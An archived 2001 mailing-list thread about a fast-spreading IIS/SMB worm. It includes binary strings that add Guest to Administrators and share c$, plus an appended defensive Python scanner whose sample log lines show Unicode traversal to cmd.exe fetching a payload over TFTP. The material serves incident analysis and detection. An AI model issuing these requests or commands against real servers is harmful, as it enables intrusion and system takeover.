You say that the worm gets a payload by tftp... Is it using port 69?

Thanks,
Dave Sill
Server Admin
Socket Internet Services
davidsat_private

Is the worm

On Tuesday 18 September 2001 10:47, you wrote:
> Hi all!
>
>
> We've all just been hit by a VERY aggressive worm/virus.
>
> Quick analysis indicates that it propagates itself in
> a number of different ways:
>
> Through use of IIS UNICODE directory traversal coupled
> with the recent IIS .dll privilege escalation attack.
> It uses SMB/CIFS and TFTP to get the worm payload.
>
> Through MAPI mails (probably to all of addressbook).
>
> Other ways of spreading may be possible, but we haven't
> yet had the time to properly analyse the worm/virus.
>
> It seems to share "c:\" via SMB/CIFS as "c$" and
> the worm/virus also adds the "Guest" user and "Guests"
> group to the local "Administrators" group....
>
>
> Interesting strings in binary:
>
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
>
> SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
> share c$=c:\
> user guest ""
> localgroup Administrators guest /add
> localgroup Guests guest /add
> user guest /active
> open
> user guest /add
> net
>
>
> More info as we come upon it.....
>
> /olle
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
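The IIS-side propagation path that olle's post describes (URL-encoded "Unicode" directory traversal into cmd.exe, then a tftp fetch of the payload) leaves a recognisable shape in the web server log. The following detection pass is an added example written for this archive page; it is not code from either poster. It assumes IIS W3C-style log fields (date, time, client IP, method, URI stem, URI query, status), treats any `..` followed by a `%c0`/`%c1` lead byte as an overlong-UTF-8 traversal (those lead bytes are never valid UTF-8), decodes the path repeatedly to catch double-encoded variants, and flags `cmd.exe` in the path and `tftp` in the query. The log lines and the payload file name `payload.dll` are constructed for the example.

```python
"""Scan IIS-style log lines for the traversal -> cmd.exe -> tftp pattern.

Added example for the incident thread; log lines below are constructed, not
captured from a real server, and the field layout is an assumption.
"""
import re
from urllib.parse import unquote

# Constructed sample: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-09-18 10:47:01 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20payload.dll 200
2001-09-18 10:47:02 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:47:03 10.0.0.9 GET /index.html - 200
2001-09-18 10:47:04 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
2001-09-18 10:47:05 10.0.0.7 GET /images/..%c0%af../logo.gif - 404
"""

# ".." followed by a two-byte sequence with lead byte C0 or C1: an overlong
# encoding of "/" or "\" that a correct UTF-8 decoder must reject.
OVERLONG_TRAVERSAL = re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.IGNORECASE)
# After decoding, any "../" or "..\" is a traversal attempt.
PLAIN_TRAVERSAL = re.compile(r"\.\.[\\/]")
CMD_SHELL = re.compile(r"cmd\.exe", re.IGNORECASE)
TFTP_FETCH = re.compile(r"\btftp\b", re.IGNORECASE)


def decode_fully(s, max_rounds=3):
    """Percent-decode until the string stops changing (catches %25-encoding).

    Invalid byte sequences decode to U+FFFD, which is fine: the overlong
    check runs on the raw text, the traversal check on the decoded text.
    """
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line):
    """Return a finding dict for one log line (severity None if benign)."""
    parts = line.split()
    if len(parts) < 7 or parts[0].startswith("#"):
        return None
    _date, _time, ip, _method, stem, query, status = parts[:7]
    query = "" if query == "-" else query
    decoded_stem = decode_fully(stem)
    decoded_query = decode_fully(query).replace("+", " ")

    flags = []
    if OVERLONG_TRAVERSAL.search(stem):
        flags.append("overlong-utf8")
    if flags or PLAIN_TRAVERSAL.search(decoded_stem):
        flags.append("traversal")
    if CMD_SHELL.search(decoded_stem):
        flags.append("cmd.exe")
    if TFTP_FETCH.search(decoded_query):
        flags.append("tftp")

    if "tftp" in flags and "cmd.exe" in flags:
        severity = "payload-fetch"      # traversal to a shell, then pulling a file
    elif "cmd.exe" in flags and "traversal" in flags:
        severity = "command-execution"
    elif flags:
        severity = "probe"
    else:
        severity = None
    return {"ip": ip, "stem": stem, "status": status,
            "flags": flags, "severity": severity}


def scan(log_text):
    """All non-benign findings, in log order."""
    findings = []
    for line in log_text.splitlines():
        finding = classify(line)
        if finding and finding["severity"] is not None:
            findings.append(finding)
    return findings


def attacking_hosts(findings):
    """Client IPs that got past probing to command execution or a payload fetch."""
    return sorted({f["ip"] for f in findings if f["severity"] != "probe"})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["stem"], f["flags"])
    print("attacking hosts:", attacking_hosts(SAMPLE_LOG and scan(SAMPLE_LOG)))
```

The fourth constructed line shows why the decode loop matters: `%255c` survives one decoding pass as `%5c` and only becomes a backslash on the second, so a single-pass detector would miss that traversal. A 200 status on a cmd.exe request is the line to act on first; a 404 on the same path shape is still worth tallying per source IP, since it shows a host scanning for the traversal.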
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:17:59 PDT